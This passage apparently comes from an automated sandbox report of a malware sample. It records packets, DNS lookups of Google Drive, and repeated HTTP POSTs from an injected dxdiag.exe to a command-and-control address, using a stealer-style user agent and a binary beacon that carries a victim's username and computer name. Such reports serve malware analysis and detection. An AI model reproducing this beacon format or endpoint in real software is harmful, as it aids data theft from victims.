                        Oct 1, 2024 07:48:20.417524099 CEST4974480192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:20.422393084 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:20.422456026 CEST4974480192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:20.427434921 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.061018944 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.061048985 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.061062098 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.061414957 CEST4974480192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.061614990 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.061656952 CEST4974480192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.061789989 CEST4974480192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.066528082 CEST8049744137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.204612970 CEST4974580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.209523916 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.209592104 CEST4974580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.212361097 CEST4974580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.217187881 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:23.217240095 CEST4974580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:23.221973896 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:25.861857891 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:25.861875057 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:25.861886978 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:25.861897945 CEST8049745137.184.191.215192.168.2.5
                        Oct 1, 2024 07:48:25.861936092 CEST4974580192.168.2.5137.184.191.215
                        Oct 1, 2024 07:48:25.861970901 CEST4974580192.168.2.5137.184.191.215

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 1, 2024 07:46:24.110692978 CEST6048653192.168.2.51.1.1.1
                        Oct 1, 2024 07:46:24.117572069 CEST53604861.1.1.1192.168.2.5
                        Oct 1, 2024 07:46:25.176707983 CEST5552253192.168.2.51.1.1.1
                        Oct 1, 2024 07:46:25.183461905 CEST53555221.1.1.1192.168.2.5

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Oct 1, 2024 07:46:24.110692978 CEST192.168.2.51.1.1.10x3a07Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                        Oct 1, 2024 07:46:25.176707983 CEST192.168.2.51.1.1.10x9719Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Oct 1, 2024 07:46:24.117572069 CEST1.1.1.1192.168.2.50x3a07No error (0)drive.google.com142.250.184.238A (IP address)IN (0x0001)false
                        Oct 1, 2024 07:46:25.183461905 CEST1.1.1.1192.168.2.50x9719No error (0)drive.usercontent.google.com142.250.184.193A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • drive.google.com
                        • drive.usercontent.google.com
                        • 137.184.191.215

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.549715137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:02.245306969 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 180
                        Connection: close
                        Oct 1, 2024 07:47:02.251203060 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: 'ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2CtEy1H
                        Oct 1, 2024 07:47:04.843025923 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:02 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:04.843049049 CEST224INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus
                        Oct 1, 2024 07:47:04.843060017 CEST1236INData Raw: 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 34 33 39 35 39 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 30 20 32 70 78 20 23 32 32 37 31 62 31 3b 0a 09 09 09 6f 75 74 6c 69 6e 65 3a 20 32 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73
                        Data Ascii: {color: #043959;box-shadow: 0 0 0 2px #2271b1;outline: 2px solid transparent;}.button {background: #f3f5f6;border: 1px solid #016087;color: #016087;display: inline-block;text-decoration: none;font-size
                        Oct 1, 2024 07:47:04.843070030 CEST142INData Raw: 3d 22 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2f 61 72 74 69 63 6c 65 2f 66 61 71 2d 74 72 6f 75 62 6c 65 73 68 6f 6f 74 69 6e 67 2f 22 3e 4c 65 61 72 6e 20 6d 6f 72 65 20 61 62 6f
                        Data Ascii: ="https://wordpress.org/documentation/article/faq-troubleshooting/">Learn more about troubleshooting WordPress.</a></p></div></body></html>


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        1192.168.2.549716137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:04.927290916 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 180
                        Connection: close
                        Oct 1, 2024 07:47:04.932136059 CEST180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: 'ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2CUTUQE
                        Oct 1, 2024 07:47:07.606863976 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:05 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:07.606890917 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:07.606904984 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        2192.168.2.549717137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:07.723172903 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:07.728143930 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:10.358056068 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:08 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:10.358074903 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:10.358084917 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        3192.168.2.549718137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:10.510857105 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:10.515717030 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:13.404769897 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:11 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:13.404789925 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:13.404800892 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
                        Data Ascii: f5f6;border-color: #7e8993;-webkit-box-shadow: none;box-shadow: none;}</style></head><body id="error-page"><div class="wp-die-message"><p>There has been a critical error on this website.</p><p><a href="https://wordpress


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        4192.168.2.549719137.184.191.215802072C:\Windows\SysWOW64\dxdiag.exe
                        TimestampBytes transferredDirectionData
                        Oct 1, 2024 07:47:13.559503078 CEST251OUTPOST /index.php/check.php?id=1 HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: 137.184.191.215
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: C7D7BA0
                        Content-Length: 153
                        Connection: close
                        Oct 1, 2024 07:47:13.564543962 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 31 00 36 00 39 00 33 00 38 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                        Data Ascii: (ckav.rualfons116938ALFONS-PC0FDD42EE188E931437F4FBE2C
                        Oct 1, 2024 07:47:16.115521908 CEST1236INHTTP/1.0 500 Internal Server Error
                        Date: Tue, 01 Oct 2024 05:47:14 GMT
                        Server: Apache/2.4.52 (Ubuntu)
                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                        Cache-Control: no-cache, must-revalidate, max-age=0
                        Content-Length: 2557
                        Connection: close
                        Content-Type: text/html; charset=UTF-8
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 27 6c 74 72 27 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 74 69 74 6c 65 3e 57 6f 72 64 50 72 65 73 73 20 26 72 73 61 71 75 6f 3b 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 68 74 6d 6c 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 31 66 31 66 31 3b 0a 09 09 7d 0a 09 09 62 6f 64 79 20 7b 0a 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 63 63 64 30 64 34 3b 0a 09 09 09 63 6f 6c 6f 72 3a [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html dir='ltr'><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="width=device-width"><title>WordPress &rsaquo; Error</title><style type="text/css">html {background: #f1f1f1;}body {background: #fff;border: 1px solid #ccd0d4;color: #444;font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;margin: 2em auto;padding: 1em 2em;max-width: 700px;-webkit-box-shadow: 0 1px 1px rgba(0, 0, 0, .04);box-shadow: 0 1px 1px rgba(0, 0, 0, .04);}h1 {border-bottom: 1px solid #dadada;clear: both;color: #666;font-size: 24px;margin: 30px 0 0 0;padding: 0;padding-bottom: 7px;}#error-page {margin-top: 50px;}#error-page p,#error-page .wp-die-message {font-size: 14px;line-height: 1.5;margin: 25px 0 2
                        Oct 1, 2024 07:47:16.115536928 CEST1236INData Raw: 30 70 78 3b 0a 09 09 7d 0a 09 09 23 65 72 72 6f 72 2d 70 61 67 65 20 63 6f 64 65 20 7b 0a 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 09 7d 0a 09 09 75
                        Data Ascii: 0px;}#error-page code {font-family: Consolas, Monaco, monospace;}ul li {margin-bottom: 10px;font-size: 14px ;}a {color: #2271b1;}a:hover,a:active {color: #135e96;}a:focus {color: #043959
                        Oct 1, 2024 07:47:16.115549088 CEST366INData Raw: 66 35 66 36 3b 0a 09 09 09 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 23 37 65 38 39 39 33 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 3b 0a
